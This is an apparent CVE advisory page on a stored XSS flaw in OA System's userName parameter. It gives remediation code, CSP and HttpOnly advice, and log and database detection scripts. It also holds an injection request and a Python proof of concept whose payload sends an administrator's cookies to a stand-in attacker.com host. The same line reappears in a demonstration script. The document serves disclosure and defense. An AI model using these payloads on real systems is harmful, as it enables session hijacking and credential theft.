How the CVE Works
CVE-2025-29691 is a stored XSS vulnerability in OA System versions before v2025.01.01. The flaw is in the handling of the `userName` parameter in /login/LoginsController.java: the value is accepted without sanitization and later rendered without output encoding, so an attacker can persist JavaScript or HTML in it. When an administrator views the affected user profile, the payload executes in the administrator's browser session, enabling session hijacking, data theft, or privilege escalation to the administrator's level. Storing the payload requires no authentication, which makes the bug easy to reach; execution still depends on an administrator opening the profile, so the attacker has to wait for, or provoke, that view. Note that LoginsController.java names the source file, not necessarily the HTTP route; confirm the path the controller is mapped to in the deployed application before testing.
DailyCVE Form
Platform: OA System
Version: < v2025.01.01
Vulnerability: Stored XSS
Severity: Critical
Date: 05/29/2025
Prediction: Patch expected by 06/15/2025
What Undercode Say:
Exploitation:
1. Craft a malicious payload:
<script>alert(document.cookie)</script>
2. Inject it through the `userName` parameter during registration or login. The request below uses the path named in the advisory; that is the source file, so confirm the route the controller actually serves before testing, and form-encode the payload (`exfiltrate()` stands for whatever the attacker's script does):
POST /login/LoginsController.java HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

userName=%3Cscript%3Eexfiltrate()%3C%2Fscript%3E
Mitigation:
1. Patch: Upgrade to v2025.01.01.
2. Encode on output, at the point where the stored value is written into the administrator's page. The ESAPI call below is HTML entity encoding for body text; use encodeForHTMLAttribute where the value lands inside an attribute. Filtering at input time alone is fragile: the stored value can later be rendered in a context the filter did not anticipate, and tag-stripping filters are routinely bypassed with nested tags.
String safeUserName = ESAPI.encoder().encodeForHTML(userName);
3. CSP header as defence in depth. With no script-src directive, default-src 'self' governs scripts and rejects inline <script> blocks and inline event handlers, so the payloads above would not run even if an encoding is missed; confirm the application's own pages do not depend on inline scripts before deploying it. Mark the session cookie HttpOnly as well: the PoC's document.cookie read fails against an HttpOnly cookie, although a script that does run can still act on the administrator's behalf.
Content-Security-Policy: default-src 'self'
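The following is an added example, not code from OA System or from the advisory, showing why the fix belongs at the output sink. It models the admin profile view as a small template with two sinks (body text and a quoted attribute), renders a constructed payload through a vulnerable and a hardened version, and checks the result with the standard-library HTML parser for the things a browser would execute. The template, the payloads and the use of html.escape in place of ESAPI's encodeForHTML are assumptions made for the demonstration; it also shows the nested-tag bypass of a tag-stripping input filter.

```python
import html
from html.parser import HTMLParser

# Constructed payloads of the kind the advisory describes (not real OA System data).
STORED_USERNAME = "<script>fetch('https://attacker.com/?c='+document.cookie)</script>"
ATTR_PAYLOAD = '" autofocus onfocus="alert(1)'          # breaks out of a quoted attribute
NESTED_PAYLOAD = "<scr<script>ipt>alert(1)</scr</script>ipt>"  # survives one-pass tag stripping


def render_profile_vulnerable(user_name: str) -> str:
    """Admin-side profile view that concatenates the stored value raw: the bug pattern."""
    return (
        "<h1>User: " + user_name + "</h1>\n"
        '<input name="userName" value="' + user_name + '">\n'
    )


def render_profile_safe(user_name: str) -> str:
    """Same view with entity encoding applied at the sink.

    html.escape(quote=True) stands in for ESAPI's encodeForHTML here and also escapes
    the quote characters, so the encoded value is safe both as body text and inside
    the double-quoted value attribute.
    """
    enc = html.escape(user_name, quote=True)
    return (
        "<h1>User: " + enc + "</h1>\n"
        '<input name="userName" value="' + enc + '">\n'
    )


def naive_strip_script_tags(user_name: str) -> str:
    """An input-side 'sanitizer' that removes <script> tags once; bypassable by nesting."""
    return user_name.replace("<script>", "").replace("</script>", "")


class ScriptSinkFinder(HTMLParser):
    """Counts <script> elements and on* event-handler attributes as a browser would parse them."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        for name, _value in attrs:
            if name.startswith("on"):
                self.event_handlers.append((tag, name))


def executable_sinks(page: str):
    """Return (number of <script> elements, [(tag, on* attribute), ...]) found in the page."""
    finder = ScriptSinkFinder()
    finder.feed(page)
    finder.close()
    return finder.script_tags, finder.event_handlers


if __name__ == "__main__":
    for label, payload in (("script", STORED_USERNAME), ("attribute", ATTR_PAYLOAD)):
        print(label, "vulnerable:", executable_sinks(render_profile_vulnerable(payload)))
        print(label, "safe:      ", executable_sinks(render_profile_safe(payload)))
    stripped = naive_strip_script_tags(NESTED_PAYLOAD)
    print("after naive strip:", stripped, executable_sinks(render_profile_vulnerable(stripped)))
```

The attribute case is the reason the lead-in insists on context: an encoder that escapes only angle brackets leaves the `"` in place and the payload becomes a live onfocus handler, while the quoted form keeps the whole value inside the attribute. The nested payload collapses to a plain `<script>` element after one pass of stripping, which is why the advisory's encode-on-output call is the fix and an input filter is at best a supplement.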
Detection:
Code audit (locates where the parameter is read and rendered; finding the string is not by itself a sign of compromise):
grep -rn "userName" /var/www/oa-system/login/
Log Analysis:
The query needs a column list (the original SELECT FROM is a syntax error) and should not depend on the case of the hex digits. It catches only a literal, single-encoded <script tag in the request line: payloads sent in a POST body never reach the access log, and attackers vary the encoding and the tag, so also scan the stored userName column in the database.
SELECT * FROM access_log WHERE LOWER(request) LIKE '%username=%3cscript%';
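As an added example (not part of the original advisory or of OA System), here is the detection logic run over a constructed access-log excerpt. It decodes the userName value before matching, handles repeated percent-encoding, and matches on tag and event-handler indicators rather than the literal string `<script`, which is what the one-line LIKE query above cannot do. The log lines, the log format and the indicator list are assumptions for the demonstration, and the last function stands in for a scan of the stored column, since POST bodies are not in the access log.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log excerpt in combined log format (not real OA System logs).
# Lines 2-4 carry the payload in the query string in three encodings; line 5 is a POST,
# whose body the web server does not log.
SAMPLE_LOG = """\
10.0.0.5 - - [29/May/2025:10:01:02 +0000] "GET /login?userName=alice HTTP/1.1" 200 512
10.0.0.9 - - [29/May/2025:10:02:11 +0000] "GET /login?userName=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512
10.0.0.9 - - [29/May/2025:10:02:40 +0000] "GET /login?userName=%3cSvG%20OnLoAd%3dalert(1)%3e HTTP/1.1" 200 512
10.0.0.9 - - [29/May/2025:10:03:05 +0000] "GET /login?userName=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 512
10.0.0.7 - - [29/May/2025:10:04:00 +0000] "POST /login HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d+)'
)

# Indicators of HTML/JS injection, applied to the decoded value. A LIKE '%userName=%3Cscript%'
# query only sees the literal, single-encoded form of one tag.
XSS_RE = re.compile(
    r"<\s*(script|svg|img|iframe|object|embed|body)\b|\bon[a-z]+\s*=|javascript:",
    re.IGNORECASE,
)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding; double encoding is a common filter bypass."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_username_requests(log_text: str):
    """Return (ip, timestamp, decoded userName) for requests whose userName looks like XSS."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        # parse_qs already applies one round of percent-decoding.
        for value in parse_qs(query, keep_blank_values=True).get("userName", []):
            decoded = fully_decode(value)
            if XSS_RE.search(decoded):
                hits.append((m["ip"], m["ts"], decoded))
    return hits


def flag_stored_usernames(usernames):
    """Scan the stored column directly; this is the reliable check for stored XSS.

    Payloads that arrived in POST bodies never reach the access log. `usernames` stands
    in for the result of SELECT userName FROM the users table (table name assumed unknown).
    """
    return [u for u in usernames if XSS_RE.search(fully_decode(u))]


if __name__ == "__main__":
    for ip, ts, value in suspicious_username_requests(SAMPLE_LOG):
        print(f"{ts} {ip} userName={value!r}")
    print(flag_stored_usernames(["alice", "<svg onload=alert(1)>", "o'neil"]))
```

The mixed-case and double-encoded lines are the ones a fixed-string query misses; both decode to ordinary tags. Tune XSS_RE to the application's legitimate username charset before alerting on it, since a permissive indicator list will fire on harmless values containing `on...=`.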
Exploit Code (PoC):
import requests

# Stored XSS payload: when an administrator opens the stored profile, this sends the
# administrator's cookies to an attacker-controlled host (fails if the session cookie is HttpOnly).
payload = "<script>fetch('https://attacker.com/?cookie='+document.cookie)</script>"

# Store it via the userName parameter. The route differs between this PoC (/login) and the
# exploitation step above (/login/LoginsController.java); confirm the real one in the target deployment.
response = requests.post("https://target.com/login", data={"userName": payload})
print(response.status_code)
Post-Patch Verification:
The version string is not normally exposed in HTTP response headers, so a curl -I | grep for it will not confirm the upgrade. Check the installed version in the application's administrative or about page (or the deployed package metadata), then re-test functionally: store a harmless marker and confirm the administrator-side profile renders it encoded.
curl -s -c jar.txt -b jar.txt https://target.com/login --data-urlencode 'userName=<b>xss-check</b>'
Then open the profile as an administrator and confirm the response body contains &lt;b&gt;xss-check&lt;/b&gt; (encoded) rather than a rendered <b>xss-check</b>.
References:
Reported By: nvd.nist.gov